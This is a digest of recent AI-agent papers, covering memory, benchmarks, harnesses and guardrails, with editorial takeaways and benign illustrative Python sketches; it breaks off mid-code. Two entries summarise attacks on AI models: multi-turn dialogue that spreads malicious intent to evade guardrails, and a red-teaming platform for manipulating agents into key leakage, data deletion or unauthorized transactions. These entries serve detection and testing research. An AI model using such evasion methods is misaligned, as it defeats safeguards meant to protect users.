Tag: agents

Intermediate

HAGE: Harnessing Agentic Memory via RL-Driven Weighted Graph Evolution

Dongming Jiang, Yi Li, Guanpeng Li, Qiannan Li, Bingzhe Li

HAGE is an approach to agent memory that goes beyond plain vector search. It recasts memory retrieval as query-conditioned graph traversal, where relationships have varying strength and confidence. This matters because many production agent systems still rely on flat retrieval, which ignores how the query context changes which memories should be connected and how heavily each connection should count. If you're building stateful agents, this provides a blueprint for a graph-based memory architecture.

Takeaways

Agent memory should be organized as weighted multi-relational graphs rather than flat vector stores.
Query-conditioned traversal enables more sophisticated retrieval than static similarity search.
Trainable relation features allow memory systems to adapt to different types of queries and contexts.
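
To make the takeaways above concrete, here is a minimal sketch of query-conditioned traversal over a weighted multi-relational graph. It is not HAGE's implementation: the graph contents, the relation names, and the hand-set `relation_affinity` dictionaries are all assumptions for illustration. In the paper the relation features are trained, whereas here they are supplied by hand per query type.

```python
import heapq
from collections import defaultdict

# Hypothetical memory graph: node -> list of (neighbor, relation, edge_weight).
GRAPH = defaultdict(list)

def add_edge(src, dst, relation, weight):
    GRAPH[src].append((dst, relation, weight))

add_edge("trip_to_berlin", "hotel_booking", "part_of", 0.9)
add_edge("trip_to_berlin", "met_alice", "temporal", 0.6)
add_edge("met_alice", "alice_email", "entity", 0.8)
add_edge("hotel_booking", "invoice_pdf", "causal", 0.7)

def traverse(start, relation_affinity, max_hops=2, top_k=3):
    """Simplified best-first traversal. Each hop is scored as
    edge_weight * relation_affinity[relation]; scores multiply along a path."""
    best = {start: 1.0}
    heap = [(-1.0, 0, start)]  # (negative path score, hops used, node)
    while heap:
        neg_score, hops, node = heapq.heappop(heap)
        score = -neg_score
        # Skip stale heap entries and nodes already at the hop limit.
        if score < best.get(node, 0.0) or hops == max_hops:
            continue
        for nxt, relation, weight in GRAPH[node]:
            nxt_score = score * weight * relation_affinity.get(relation, 0.0)
            if nxt_score > best.get(nxt, 0.0):
                best[nxt] = nxt_score
                heapq.heappush(heap, (-nxt_score, hops + 1, nxt))
    ranked = sorted(((s, n) for n, s in best.items() if n != start), reverse=True)
    return [(n, round(s, 3)) for s, n in ranked[:top_k]]

# Two hand-written affinity profiles standing in for learned, query-dependent ones.
WHO_QUERY = {"temporal": 1.0, "entity": 1.0, "part_of": 0.2, "causal": 0.1}
BILLING_QUERY = {"part_of": 1.0, "causal": 1.0, "temporal": 0.1, "entity": 0.1}

who_results = traverse("trip_to_berlin", WHO_QUERY)
billing_results = traverse("trip_to_berlin", BILLING_QUERY)
```

The same start node yields different rankings under the two profiles, which is the point of conditioning traversal on the query rather than relying on a single static similarity score.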

from May 18, 2026 · 0 citations · via api-hf · arXiv:2605.09942

Intermediate

WildClawBench: A Benchmark for Real-World, Long-Horizon Agent Evaluation

Shuangrui Ding, Xuanlang Dai, Long Xing, Shengyuan Ding, Ziyu Liu, Yang JingYi, Penghui Yang, Zhixiong Zhang, Xilin Wei, Xinyu Fang, Yubo Ma, Haodong Duan, Jing Shao, Jiaqi Wang, Dahua Lin, Kai Chen, Yuhang Zang

agents evaluations how-we-work

This benchmark exposes the gap between synthetic agent evaluations and real-world performance. While most benchmarks use mock APIs and toy tasks, WildClawBench runs agents in actual CLI environments with real tools on tasks lasting 8+ minutes. The results are sobering: even frontier models like Claude Opus achieve only 35% success rates. If you're building production agents, this benchmark shows what you're actually up against.

Takeaways

Synthetic benchmarks dramatically overestimate real-world agent performance in production environments.
Long-horizon tasks in native runtimes reveal fundamental limitations even in frontier models.
Production agent deployment requires significantly different evaluation criteria than academic benchmarks suggest.

from May 18, 2026 · via api-hf · arXiv:2605.10912

Intermediate

One Turn Too Late: Response-Aware Defense Against Hidden Malicious Intent in Multi-Turn Dialogue

Xinjie Shen, Rongzhe Wei, Peizhi Niu, Haoyu Wang, Ruihan Wu, Eli Chien, Bo Li, Pin-Yu Chen, Pan Li

security agents evaluations

Hidden malicious intent across multiple dialogue turns represents a sophisticated attack vector that current guardrails miss. This research provides both detection methods and the Multi-Turn Intent Dataset for training systems to identify when seemingly innocent conversations accumulate into harmful instructions. Critical for anyone deploying conversational AI systems that need to detect distributed attacks rather than just obvious single-turn violations.

Takeaways

Multi-turn attacks can bypass safety measures by distributing malicious intent across seemingly benign interactions.
Turn-level intervention requires precise detection of harm-enabling closure points without premature refusal.
Production conversational systems need specialized guardrails for accumulated harmful intent detection.

from May 18, 2026 · via api-hf · arXiv:2605.05630

Intermediate

Harness engineering: leveraging Codex in an agent-first world

agents software-engineering how-we-work

Essential reading for anyone building agent-first development workflows. The author, Lopopolo, shares practical insights from working with Codex that challenge conventional wisdom about how AI should integrate into software engineering processes. Rather than another theoretical piece, it is a practitioner's guide to harnessing AI agents in real development environments where traditional tooling falls short.

Takeaways

Agent-first workflows require fundamentally different architectural thinking than traditional AI-assisted development.
Codex integration succeeds when it becomes the primary interface rather than a secondary tool.
Production agent systems need careful harness engineering to bridge the gap between AI capabilities and developer workflows.

from May 18, 2026 · via manual

Accessible

SWE-WebDevBench: Evaluating Coding Agent Application Platforms as Virtual Software Agencies

Siddhant Saxena, Nilesh Trivedi, Vinayaka Jyothi

software-engineering evaluations agents how-we-work

The first comprehensive evaluation framework for AI coding platforms that treats them as virtual software agencies rather than just code generators. The 68-metric evaluation across product management, engineering, and operations reveals four critical shortcomings in current platforms: specification bottlenecks, architectural blind spots, iteration fragility, and business readiness gaps—essential insights for anyone building or evaluating AI development tools.

Takeaways

AI coding platforms need evaluation beyond code quality to include product management and operations capabilities.
Current platforms struggle with specification understanding, architectural decisions, and iterative development.
Business readiness requires capabilities spanning multiple roles, not just engineering output.

from May 11, 2026 · via api-hf · arXiv:2605.04637

Intermediate

Agentic AI Systems Should Be Designed as Marginal Token Allocators

Siqi Zhu

agents opinion foundational how-we-work

Essential reading if you're building agentic systems—this paper reframes agent design through economic principles, showing how routing, planning, serving, and training decisions all solve the same optimization problem: marginal benefit equals marginal cost plus latency plus risk. Instead of thinking about agents as text generators, this framework treats them as token allocation economies, explaining why locally optimal decisions often lead to globally suboptimal performance.

Takeaways

All agent system layers (routing, planning, serving, training) solve the same economic optimization problem.
Local token minimization often leads to global misallocation of computational resources.
Agent performance should be evaluated through marginal token allocation efficiency rather than just accuracy metrics.
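
As a rough illustration of the marginal rule described above, the sketch below hands out token chunks greedily and stops once the next chunk's marginal benefit no longer exceeds its marginal cost. The benefit curves, the chunk size, and the three cost components are invented numbers for illustration only; the paper's own formulation may differ.

```python
import math

def allocate(benefit_fns, marginal_cost, chunk=100, max_chunks=50):
    """Give each next chunk of tokens to the task with the highest marginal
    benefit; stop when no task's marginal benefit exceeds the marginal cost."""
    spent = {name: 0 for name in benefit_fns}
    for _ in range(max_chunks):
        # Marginal benefit of one more chunk for every task.
        gains = {
            name: fn(spent[name] + chunk) - fn(spent[name])
            for name, fn in benefit_fns.items()
        }
        name, gain = max(gains.items(), key=lambda kv: kv[1])
        if gain <= marginal_cost:
            break
        spent[name] += chunk
    return spent

# Hypothetical concave benefit curves (diminishing returns per extra token).
BENEFITS = {
    "planning": lambda t: 10.0 * math.log1p(t / 100),
    "retrieval": lambda t: 3.0 * math.log1p(t / 100),
}

# Marginal cost per chunk = token price + latency penalty + risk penalty (assumed values).
MARGINAL_COST = 0.5 + 0.3 + 0.2

budget = allocate(BENEFITS, MARGINAL_COST)
```

Under these assumed curves the allocator spends far more on planning than on retrieval, because planning's marginal benefit stays above the cost line for longer. Capping each task at the same small budget would save tokens locally while leaving benefit on the table, which is the kind of misallocation the takeaways describe.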

from May 11, 2026 · via api-hf · arXiv:2605.01214

Accessible

DecodingTrust-Agent Platform (DTap): A Controllable and Interactive Red-Teaming Platform for AI Agents

Zhaorun Chen, Xun Liu, Haibo Tong, Chengquan Guo, Yuzhou Nie, Jiawei Zhang, Mintong Kang, Chejian Xu, Qichang Liu, Xiaogeng Liu, Tianneng Shi, Chaowei Xiao, Sanmi Koyejo, Percy Liang, Wenbo Guo, Dawn Song, Bo Li

agents security evaluations

The first comprehensive red-teaming platform specifically designed for AI agents, addressing the critical security gap as agents move from demos to production. With agents increasingly handling sensitive operations like API calls, data management, and financial transactions, DTap provides 14 real-world domains and 50+ simulation environments to systematically test how adversaries can manipulate agents into harmful actions—essential infrastructure for anyone deploying agents in production.

Takeaways

Agent security testing requires specialized tools beyond traditional LLM red-teaming approaches.
Real-world agent vulnerabilities span API key leakage, data deletion, and unauthorized transactions.
Comprehensive security evaluation needs controllable, reproducible environments across multiple domains.

from May 11, 2026 · via api-hf · arXiv:2605.04808

Intermediate

AgentEscapeBench: Evaluating Out-of-Domain Tool-Grounded Reasoning in LLM Agents

Zhengkang Guo

agents evaluations

This benchmark directly tackles the hardest problem in agent development: maintaining reasoning quality when tools have complex dependencies and long-range interactions. The escape-room design forces agents to track hidden state, propagate intermediate results, and handle novel workflows—exactly the scenarios where production agents fail most spectacularly, with performance dropping from 90% to 60% as dependency depth increases.

Takeaways

Agent performance degrades sharply as tool dependency chains become more complex.
Current agents struggle with maintaining state across long sequences of tool interactions.
Real-world agent reliability requires testing beyond simple, isolated tool-use scenarios.

from May 11, 2026 · via api-arxiv · arXiv:2605.07926

Intermediate

Tool Calling is Linearly Readable and Steerable in Language Models

Zekun Wu

llms agents foundational

This research shows that tool selection in LLMs is linearly readable and controllable: steering internal activations changes which tool gets chosen with 77-100% accuracy. More importantly for production systems, the confidence gap between the top tools predicts failure rates, with small gaps producing 14-21x more errors, which gives you a way to catch tool-calling mistakes before they execute.

Takeaways

Tool selection decisions are linearly readable in model activations and can be steered with high accuracy.
The confidence gap between top tool choices reliably predicts failure rates.
Tool-calling errors can be detected before execution by monitoring internal activation patterns.
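
A minimal sketch of how a confidence-gap check might gate tool calls. It assumes you already have one score per candidate tool (for example from a linear probe on activations, as the paper studies, or from the model's own logits). The tool names, the scores, and the `min_gap` threshold of 0.2 are arbitrary illustrative values, not figures from the paper.

```python
import math

def top2_gap(tool_scores):
    """Return (best_tool, gap), where gap is the softmax probability
    difference between the top two candidate tools."""
    peak = max(tool_scores.values())
    exps = {tool: math.exp(score - peak) for tool, score in tool_scores.items()}
    total = sum(exps.values())
    ranked = sorted(((v / total, tool) for tool, v in exps.items()), reverse=True)
    (p1, best), (p2, _) = ranked[0], ranked[1]
    return best, p1 - p2

def should_review(tool_scores, min_gap=0.2):
    """Flag a tool call for extra checking when the top two tools are close."""
    best, gap = top2_gap(tool_scores)
    return best, gap < min_gap

# Hypothetical per-tool scores for two different requests.
ambiguous = {"search": 2.0, "calculator": 1.9, "email": -1.0}
confident = {"search": 4.0, "calculator": 0.5, "email": -1.0}

ambiguous_decision = should_review(ambiguous)
confident_decision = should_review(confident)
```

A flagged call could be routed to a confirmation step or a second model before execution. Where to set the threshold is an empirical question for your own traffic.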

from May 11, 2026 · via api-arxiv · arXiv:2605.07990

Accessible

Operating-Layer Controls for Onchain Language-Model Agents Under Real Capital

T. J. Barton, Chris Constantakis, Patti Hauseman, Annie Mous, Alaska Hoffman, Brian Bergeron, Hunter Goodreau

agents software-engineering evaluations how-we-work

A remarkable real-world case study of autonomous LLM agents managing actual financial capital over 21 days, generating 7.5M invocations and $20M in trading volume with 99.9% settlement success. This paper provides invaluable insights into building reliable production agent systems, showing that reliability emerges from the operating layer architecture rather than the base model alone.

Takeaways

Reliability in production AI agents comes from systematic operating layer controls, not just model capabilities.
Real capital deployment reveals failure modes and reliability patterns invisible in simulation environments.
Large-scale agent deployments require careful attention to validation, state management, and settlement infrastructure.

from May 4, 2026 · via api-hf · arXiv:2604.26091

Intermediate

ClawMark: A Living-World Benchmark for Multi-Turn, Multi-Day, Multimodal Coworker Agents

Fanqing Meng, Lingxiao Du, Zijian Wu, Guanzheng Chen, Xiangyan Liu, Jiaqi Liao, Chonghe Jiang, Zhenglin Wan, Jiawei Gu, Pengfei Zhou, Rui Huang, Ziqi Zhao, Shengyuan Ding, Ailing Yu, Bo Peng, Bowei Xia, Hao Sun, Haotian Liang, Ji Xie, Jiajun Chen, Jiajun Song, Liu Yang, Ming Xu, Qionglin Qiu, Runhao Fu, Shengfang Zhai, Shijian Wang, Tengfei Ma, Tianyi Wu, Weiyang Jin, Yan Wang, Yang Dai, Yao Lai, Youwei Shu, Yue Liu, Yunzhuo Hao, Yuwei Niu, Jinkai Huang, Jiayuan Zhuo, Zhennan Shen, Linyu Wu, Cihang Xie, Yuyin Zhou, Jiaheng Zhang, Zeyu Zheng, Mengkang Hu, Michael Qizhe Shieh

agents evaluations

Addresses a critical gap in agent evaluation by introducing benchmarks for persistent, multi-day coworker agents that operate in evolving environments with emails, calendars, and documents. This benchmark is essential for teams building production agent systems that need to maintain context and effectiveness across extended time periods rather than single-session interactions.

Takeaways

Multi-day, stateful agent evaluation requires fundamentally different benchmarks than single-episode tasks.
Production coworker agents must handle independently evolving environments with multimodal information sources.
Deterministic verification methods can replace LLM-as-judge approaches for more reliable agent assessment.

from May 4, 2026 · via api-hf · arXiv:2604.23781

Intermediate

The Last Harness You'll Ever Build

Haebin Seong, Li Yin, Haoran Zhang

agents software-engineering how-we-work

Presents an evolutionary framework that automates the painful process of building agent harnesses for new domains, using adversarial evaluation and iterative refinement to optimize prompts, tools, and orchestration logic. This directly tackles one of the biggest bottlenecks in production AI systems—the manual engineering required to make foundation models effective for specific enterprise workflows.

Takeaways

Agent harness engineering can be automated through evolutionary optimization with adversarial evaluation feedback.
The meta-evolution loop concept enables systems to improve their own optimization processes over time.
Automated harness creation could dramatically reduce the engineering overhead of deploying agents in new domains.

from May 4, 2026 · via api-hf · arXiv:2604.21003

Intermediate

The Last Human-Written Paper: Agent-Native Research Artifacts

Jiachen Liu, Jiaxin Pei, Jintao Huang, Chenglei Si, Ao Qu, Xiangru Tang, Runyu Lu, Lichang Chen, Xiaoyan Bai, Haizhong Zheng, Carl Chen, Zhiyang Chen, Haojie Ye, Yujuan Fu, Zexue He, Zijian Jin, Zhenyu Zhang, Shangquan Sun, Maestro Harmon, John Dianzhuo Wang, Jianqiao Zeng, Jiachen Sun, Mingyuan Wu, Baoyu Zhou, Chenyu You, Shijian Lu, Yiming Qiu, Fan Lai, Yuan Yuan, Yao Li, Junyuan Hong, Ruihao Zhu, Beidi Chen, Alex Pentland, Ang Chen, Mosharaf Chowdhury, Zechen Zhang

foundational agents software-engineering opinion

Proposes a radical reimagining of research artifacts as machine-executable packages that preserve the full exploration process, including failures and implementation details that traditional papers discard. For teams building AI agents that need to understand and extend existing work, this framework offers a path toward truly reproducible and agent-consumable research.

Takeaways

Traditional research papers impose storytelling and engineering taxes that make them unsuitable for AI agents to consume and extend.
Agent-native artifacts should preserve the full exploration graph including failed experiments and rejected hypotheses.
Machine-executable research packages can bridge the gap between human-readable findings and agent-actionable specifications.

from May 4, 2026 · via api-hf · arXiv:2604.24658

Intermediate

Vision-Language-Action Safety: Threats, Challenges, Evaluations, and Mechanisms

Qi Li, Bo Yin, Weiqi Huang, Ruhao Liu, Bojun Zou, Runpeng Yu, Jingwen Ye, Weihao Yu, Xinchao Wang

security agents

Provides a comprehensive framework for understanding safety challenges in Vision-Language-Action models, organizing threats and defenses across training and inference time dimensions. Critical reading for teams building embodied AI systems, as it unifies fragmented safety research and highlights unique risks like irreversible physical consequences and multimodal attack surfaces.

Takeaways

VLA systems face unique safety challenges including irreversible physical consequences and multimodal attack vectors.
Attack and defense timing frameworks help organize mitigation strategies across the development lifecycle.
Embodied AI safety requires different approaches than text-only LLM safety due to real-world interaction constraints.

from May 4, 2026 · via api-hf · arXiv:2604.23775

Accessible

The Continuity Layer: Why Intelligence Needs an Architecture for What It Carries Forward

Samuel Sameer Tanguturi

opinion foundational agents how-we-work

This position paper argues that the most critical missing piece in AI architecture is a 'continuity layer' that preserves what models learn across sessions, addressing the fundamental amnesia problem where powerful per-session intelligence is lost when contexts reset. The paper challenges the field's focus on model size over persistent understanding and outlines specific engineering requirements for systems that truly accumulate knowledge over time.

Takeaways

The absence of persistent memory across sessions is a more critical architectural problem than model size in current AI systems.
Current memory APIs return flat facts that models must reinterpret from scratch, creating powerful but amnesiac intelligence.
A continuity layer requires seven specific characteristics including persistent state, selective retention, and coherent knowledge integration.

from Apr 27, 2026 · via api-hf · arXiv:2604.17273

Intermediate

AgentSPEX: An Agent SPecification and EXecution Language

Pengcheng Wang, Jerry Huang, Jiarui Yao, Rui Pan, Peizhi Niu, Yaowenqi Liu, Ruida Wang, Renhao Lu, Yuwei Guo, Tong Zhang

agents software-engineering

AgentSPEX introduces a declarative language for specifying LLM agent workflows with explicit control flow. It targets two problems: reactive prompting makes agent behavior unpredictable, and frameworks like LangGraph and CrewAI couple workflow logic tightly to Python code, which becomes hard to maintain as workflows grow complex.

Takeaways

Current agent frameworks tightly couple workflow logic with Python code, making agents difficult to maintain as they grow complex.
Explicit control flow with typed steps, branching, and state management provides better structure than reactive prompting approaches.
Separating workflow specification from execution environment enables better tooling, verification, and collaborative development of agent systems.
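
The separation of specification from execution can be sketched as follows. This is not AgentSPEX syntax: the dictionary schema, the step types `call` and `branch`, and the handler names are all hypothetical, chosen only to show a workflow expressed as data and run by a small generic interpreter.

```python
# Hypothetical declarative workflow: plain data, no control flow in Python.
WORKFLOW = {
    "start": "classify",
    "steps": {
        "classify": {"type": "call", "fn": "classify_ticket", "next": "route"},
        "route": {
            "type": "branch",
            "on": "category",
            "cases": {"billing": "refund", "other": "reply"},
        },
        "refund": {"type": "call", "fn": "draft_refund", "next": None},
        "reply": {"type": "call", "fn": "draft_reply", "next": None},
    },
}

def run(workflow, handlers, state):
    """Generic interpreter: follows the spec and records which steps ran."""
    step_name = workflow["start"]
    trace = []
    while step_name is not None:
        step = workflow["steps"][step_name]
        trace.append(step_name)
        if step["type"] == "call":
            # Each handler returns a dict of state updates.
            state.update(handlers[step["fn"]](state))
            step_name = step["next"]
        elif step["type"] == "branch":
            cases = step["cases"]
            step_name = cases.get(state[step["on"]], cases["other"])
        else:
            raise ValueError(f"unknown step type: {step['type']}")
    return state, trace

# Stub handlers standing in for LLM or tool calls.
HANDLERS = {
    "classify_ticket": lambda s: {"category": "billing" if "charge" in s["text"] else "other"},
    "draft_refund": lambda s: {"draft": "refund"},
    "draft_reply": lambda s: {"draft": "reply"},
}

final_state, trace = run(WORKFLOW, HANDLERS, {"text": "duplicate charge on my card"})
```

Because the workflow is data, it can be validated, diffed, or visualized without executing any handler, which is the tooling benefit the third takeaway points to.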

from Apr 27, 2026 · via api-hf · arXiv:2604.13346

Accessible

SWE-chat: Coding Agent Interactions From Real Users in the Wild

Joachim Baumann, Vishakh Padmakumar, Xiang Li, John Yang, Diyi Yang, Sanmi Koyejo

agents software-engineering how-we-work evaluations

SWE-chat provides the first large-scale empirical evidence of how developers actually use AI coding agents in the wild, revealing that usage patterns are bimodal and agents are surprisingly inefficient. The dataset shows that only 44% of agent-produced code makes it into user commits, challenging the narrative of coding agent effectiveness and providing crucial insights for anyone building or deploying these tools in production.

Takeaways

Real-world coding patterns are bimodal: 41% of sessions involve agents writing virtually all code, while 23% have humans writing everything themselves.
Despite improving capabilities, only 44% of agent-produced code survives into user commits, revealing significant inefficiency in natural settings.
The first large-scale dataset of real coding agent usage provides empirical evidence that challenges assumptions about agent effectiveness in production.

from Apr 27, 2026 · via api-hf · arXiv:2604.20779

Intermediate

Symbolic Guardrails for Domain-Specific Agents: Stronger Safety and Security Guarantees Without Sacrificing Utility

Yining Hong, Yining She, Eunsuk Kang, Christopher S. Timperley, Christian Kästner

agents security evaluations

This research addresses a critical gap in AI agent security by introducing symbolic guardrails that provide formal guarantees against harmful actions, unlike neural approaches that only improve reliability. The paper reveals that 85% of agent safety benchmarks lack concrete policies, making this framework essential for anyone deploying agents in high-stakes business environments where privacy breaches or financial losses are unacceptable.

Takeaways

Symbolic guardrails can provide formal safety guarantees for AI agents, unlike training-based methods that only improve reliability.
85% of current agent safety benchmarks lack concrete policies, relying instead on vague high-level goals or common sense.
74% of well-specified policy requirements can be guaranteed through symbolic guardrails without sacrificing agent utility.
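
To illustrate what a symbolic guardrail looks like in practice, the sketch below checks each proposed tool call against explicit predicates before it runs. The tools, the argument names, the refund limit, and the allowed email domain are hypothetical; the paper's own policy language and enforcement mechanism are not reproduced here.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ToolCall:
    tool: str
    args: dict

# Each policy is a deterministic predicate: True means the call is allowed.
def refund_within_limit(call):
    return call.tool != "issue_refund" or call.args.get("amount", 0) <= 100

def no_external_email(call):
    return call.tool != "send_email" or call.args.get("to", "").endswith("@example.com")

POLICIES = [refund_within_limit, no_external_email]

def check(call):
    """Return (allowed, names_of_violated_policies) for a proposed tool call."""
    violations = [policy.__name__ for policy in POLICIES if not policy(call)]
    return len(violations) == 0, violations

small_refund = check(ToolCall("issue_refund", {"amount": 40}))
large_refund = check(ToolCall("issue_refund", {"amount": 5000}))
external_mail = check(ToolCall("send_email", {"to": "someone@elsewhere.org"}))
```

Unlike a learned classifier, the check gives the same answer for the same call every time, so a violation of a stated policy cannot slip through. The limitation is that it only covers requirements concrete enough to write as predicates.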

from Apr 27, 2026 · via api-hf · arXiv:2604.15579

Intermediate

TREX: Automating LLM Fine-tuning via Agent-Driven Tree-based Exploration

Zerun Ma, Guoqiang Wang, Xinchen Xie, Yicheng Chen, He Du, Bowen Li, Yanan Sun, Wenran Liu, Kai Chen, Yining Li

agents software-engineering how-we-work

TREX automates the entire LLM fine-tuning pipeline through multi-agent collaboration, from literature research to data preparation to model evaluation. This challenges the current reality where fine-tuning requires extensive manual orchestration by ML engineers, offering a glimpse into fully automated ML workflows that could democratize model customization for domain-specific applications.

Takeaways

Multi-agent systems can automate complex ML workflows beyond individual tasks, handling entire fine-tuning lifecycles.
Modeling the experimental process as a search tree enables efficient exploration and reuse of historical training results.
Automated fine-tuning could significantly reduce the expertise barrier for domain-specific LLM customization.

from Apr 20, 2026 · via api-hf · arXiv:2604.14116

Intermediate

Don't Retrieve, Navigate: Distilling Enterprise Knowledge into Navigable Agent Skills for QA and RAG

Yiqun Sun, Pengfei Wei, Lawrence B. Hsieh

rag agents software-engineering

Corpus2Skill fundamentally reimagines RAG by giving AI agents a navigable map of your knowledge base instead of treating them as passive consumers of search results. Rather than hoping retrieval finds the right documents, agents can see the corpus structure, drill down through hierarchical summaries, and strategically combine evidence across different branches—solving the core limitation that RAG systems can't reason about what they haven't seen.

Takeaways

Traditional RAG limits AI agents to passive consumption of search results without visibility into corpus structure or unexplored areas.
Hierarchical skill directories enable agents to navigate knowledge strategically and combine evidence across different topic branches.
Offline corpus compilation into navigable structures provides better performance than runtime retrieval-only approaches.
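
The navigation idea can be sketched with a small summary tree that an agent walks from the root. The tree contents and file names are invented, and the keyword-overlap scoring is only a stand-in for the agent's own judgment about which branch to open. None of this reflects Corpus2Skill's actual data format.

```python
# Hypothetical offline-compiled hierarchy: each node has a summary,
# child branches, and (at the leaves) the documents it covers.
TREE = {
    "summary": "company knowledge base",
    "children": {
        "hr": {
            "summary": "leave policy benefits onboarding",
            "children": {},
            "docs": ["leave_policy.md", "benefits.md"],
        },
        "it": {
            "summary": "laptops vpn network accounts",
            "children": {
                "network": {"summary": "vpn wifi firewall", "children": {}, "docs": ["vpn_setup.md"]},
                "hardware": {"summary": "laptops monitors", "children": {}, "docs": ["laptop_request.md"]},
            },
            "docs": [],
        },
    },
    "docs": [],
}

def navigate(node, query_terms, path=()):
    """Drill down by picking, at each level, the child whose summary shares
    the most words with the query. Returns (path, documents_at_leaf)."""
    if not node["children"]:
        return list(path), node["docs"]

    def overlap(child):
        return len(query_terms & set(child["summary"].split()))

    name, child = max(node["children"].items(), key=lambda kv: overlap(kv[1]))
    return navigate(child, query_terms, path + (name,))

vpn_path, vpn_docs = navigate(TREE, {"vpn"})
```

The agent sees the branch summaries at every level, so it can also notice which branches it chose not to open, something a flat top-k retrieval result does not expose.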

from Apr 20, 2026 · via api-hf · arXiv:2604.14572

Accessible

Steve Yegge

how-we-work agents software-engineering opinion

Yegge's conversation reveals that even Google's engineering teams follow the same AI adoption pattern as traditional companies: 20% power users building with agents, 20% refusing AI tools entirely, and 60% stuck using basic chat interfaces like Cursor. This insight challenges assumptions about tech giants being ahead on internal AI adoption and suggests most organizations are at similar maturity levels regardless of their AI product offerings.

Takeaways

Google's internal AI adoption mirrors that of traditional companies, despite its advanced AI research and products.
The industry-wide pattern shows 60% of engineers still using basic chat tools rather than advanced agentic workflows.
Having cutting-edge AI products doesn't necessarily translate to advanced internal adoption within engineering teams.

from Apr 20, 2026 · 0 citations · via rss-willison

Intermediate

When Using AI Leads to “Brain Fry”

agents how-we-work foundational

If your team is pushing engineers to maximize AI agent usage (measured by token consumption), this research reveals the hidden costs you're creating. Organizations incentivizing heavy AI tool oversight are inadvertently driving employees to a cognitive breaking point where mental fatigue leads to increased errors, poor decision-making, and higher turnover. Essential reading for engineering leaders designing AI-driven workflows who want to avoid burning out their teams.

Takeaways

Measuring and rewarding token consumption as a performance metric directly contributes to cognitive overload and employee burnout.
"AI brain fry" manifests as mental fog, slower decision-making, and headaches from excessive AI tool oversight beyond cognitive capacity.
AI workflows can be designed to reduce burnout through specific manager, team, and organizational practices that limit cognitive strain.

from Apr 20, 2026 · via manual

Accessible

Sema Code: Decoupling AI Coding Agents into Programmable, Embeddable Infrastructure

Huacan Wang, Jie Zhou, Ningyan Zhu, Shuo Zhang, Feiyu Chen, Jiarou Wu, Ge Chen, Chen Liu, Wangyi Chen, Xiaofeng Mou, Yi Xu

software-engineering agents how-we-work

Sema Code tackles the enterprise reality that every AI coding solution locks you into their specific interface, making it impossible to reuse AI capabilities across different development environments. Their embeddable architecture decouples the AI reasoning engine from delivery mechanisms, letting teams integrate the same AI coding capabilities into CLIs, IDEs, web apps, or custom toolchains without rebuilding from scratch.

Takeaways

Current AI coding solutions create vendor lock-in by coupling reasoning capabilities with specific delivery interfaces.
Decoupling the AI engine into a standalone library enables reuse across heterogeneous engineering environments.
The framework addresses enterprise needs like multi-tenancy, session management, and permission control that are missing from consumer AI coding tools.

from Apr 20, 2026 · via api-hf · arXiv:2604.11045

Intermediate

SkVM: Compiling Skills for Efficient Execution Everywhere

Le Chen, Erhu Feng, Yubin Xia, Haibo Chen

agents software-engineering foundational

SkVM addresses the critical problem that AI agent "skills" behave inconsistently across different platforms because they're treated as raw prompts rather than compiled code. By applying traditional compiler techniques to LLM skills—measuring model capabilities, performing capability-based compilation, and enabling runtime optimization—this system makes agent skills truly portable and efficient across different model-harness combinations.

Takeaways

Treating AI agent skills as compilable code rather than raw prompts enables consistent behavior across different platforms.
Capability profiling of model-harness pairs allows for targeted compilation and optimization of skill execution.
JIT compilation and adaptive recompilation techniques can significantly improve agent skill performance at runtime.

from Apr 20, 2026 · via api-hf · arXiv:2604.03088

Intermediate

Neural Computers

Mingchen Zhuge, Changsheng Zhao, Haozhe Liu, Zijian Zhou, Shuming Liu, Wenyi Wang, Ernie Chang, Gael Le Lan, Junjie Fei, Wenxuan Zhang, Yasheng Sun, Zhipeng Cai, Zechun Liu, Yunyang Xiong, Yining Yang, Yuandong Tian, Yangyang Shi, Vikas Chandra, Jürgen Schmidhuber

foundational agents software-engineering

This paper proposes a paradigm shift in which models don't just generate code or control external systems: they become the execution environment itself, unifying computation, memory, and I/O in learned runtime state. Neural Computers learn to execute programs by watching I/O traces and can potentially be reprogrammed through natural language rather than traditional coding. While early-stage, this vision could reshape how we build AI systems by eliminating the boundary between model and runtime environment.

Takeaways

Neural Computers eliminate the distinction between model and execution environment by making the model itself the running computer.
Early implementations can learn interface primitives and basic execution patterns from I/O traces alone.
This paradigm shift could enable natural language reprogramming of computational systems without traditional coding interfaces.

from Apr 13, 2026 · via api-hf · arXiv:2604.06425

Intermediate

Claw-Eval: Toward Trustworthy Evaluation of Autonomous Agents

Bowen Ye, Rang Li, Qibin Yang, Yuanxin Liu, Linli Yao, Hanglong Lv, Zhihui Xie, Chenxin An, Lei Li, Lingpeng Kong, Qi Liu, Zhifang Sui, Tong Yang

agents evaluations software-engineering

Current agent benchmarks are dangerously inadequate for production deployment because they only check final outputs without understanding how agents got there, and they barely evaluate safety or robustness. Claw-Eval fixes this with 300 real-world tasks that record every agent action through execution traces, audit logs, and environment snapshots, enabling fine-grained evaluation across completion, safety, and robustness dimensions. This comprehensive approach is essential for teams serious about deploying autonomous agents in high-stakes environments.

Takeaways

Current agent evaluation methods are inadequate for production use because they ignore the decision-making process and safety concerns.
Comprehensive evaluation requires tracking every agent action through multiple evidence channels, not just final outputs.
Real production deployment demands measuring completion, safety, and robustness across multiple trials with fine-grained rubrics.

from Apr 13, 2026 · via api-hf · arXiv:2604.06132

Accessible

ClawsBench: Evaluating Capability and Safety of LLM Productivity Agents in Simulated Workspaces

Xiangyi Li, Kyoung Whan Choe, Yimin Liu, Xiaokun Chen, Chujun Tao, Bingran You, Wenbo Chen, Zonglin Di, Jiankai Sun, Shenghan Zheng, Jiajun Bao, Yuanli Wang, Weixiang Yan, Yiyuan Li, Han-chung Lee

agents evaluations security how-we-work

Testing agents on live productivity services is too risky, but existing benchmarks don't capture the complexity of real workflows across Gmail, Slack, and Google services. ClawsBench solves this with high-fidelity mock services that maintain full state and support deterministic snapshot/restore, enabling safe evaluation of 44 structured tasks including dangerous scenarios. The research reveals that domain skills (API knowledge injection) and meta prompts (cross-service coordination) are independent levers that teams can optimize separately for better agent performance.

Takeaways

High-fidelity simulation environments with full state management enable safe evaluation of agents in realistic productivity scenarios.
Domain skills and meta prompts are independent architectural components that can be optimized separately for better agent performance.
Safety-critical scenarios must be explicitly tested since agents can cause irreversible damage in productivity environments.
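
A minimal sketch of the snapshot/restore pattern that makes dangerous scenarios safe to test. The `MockMailbox` class and its methods are hypothetical and far simpler than ClawsBench's mock services. The point is only that full in-memory state plus deep copies gives deterministic resets between trials.

```python
import copy

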